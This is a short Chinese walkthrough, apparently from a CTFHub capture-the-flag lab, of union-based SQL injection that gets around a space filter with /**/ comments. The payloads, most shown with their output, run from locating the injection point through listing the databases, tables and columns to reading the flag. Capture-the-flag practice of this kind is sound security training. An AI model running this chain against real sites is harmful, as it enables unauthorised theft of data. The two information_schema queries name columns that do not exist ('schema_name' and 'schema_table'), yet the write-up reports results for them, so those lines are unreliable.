常用绕过空格过滤的方法:
/**/、()、%0a
1.判断是否存在sqli注入
1
1/**/union/**/select/**/1=1
1/**/union/**/select/**/1=2
如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,
与1的结果一样说明存在注入点
2
3 没有回显,说明只用 1,2 这两个
1/**/union/**/select/**/1,2 没有将数据带出来
修改最前面的注入点:为 -1 等其他数字
-1/**/union/**/select/**/1,2
-1/**/union/**/select/**/1,version()
查看数据库版本:10.3.22-MariaDB-0+deb10u1
-1/**/union/**/select/**/1,database()
报出当前数据库:sqli
-1/**/union/**/select/**/1,group_concat(schema_name)/**/
from/**/information_schema.schemata
报出所有的数据库:information_schema,mysql,performance_schema,sqli
-1/**/union/**/select/**/1,group_concat(table_name)/**/
from/**/information_schema.tables/**/
where/**/schema_name='sqli'
报数据库 sqli 中 表名:news,beskggkoxn
-1/**/union/**/select/**/1,group_concat(column_name)/**/
from/**/information_schema.columns/**/
where/**/schema_table='beskggkoxn'
通过表名:beskggkoxn 报字段名:dzkctujmta
-1/**/union/**/select/**/1,group_concat(dzkctujmta)/**/
from/**/sqli.beskggkoxn
通过数据库sqli中 数据表beskggkoxn 中的字段名dzkctujmta报字段内容:ctfhub{b8947534164e94454cade1e1}
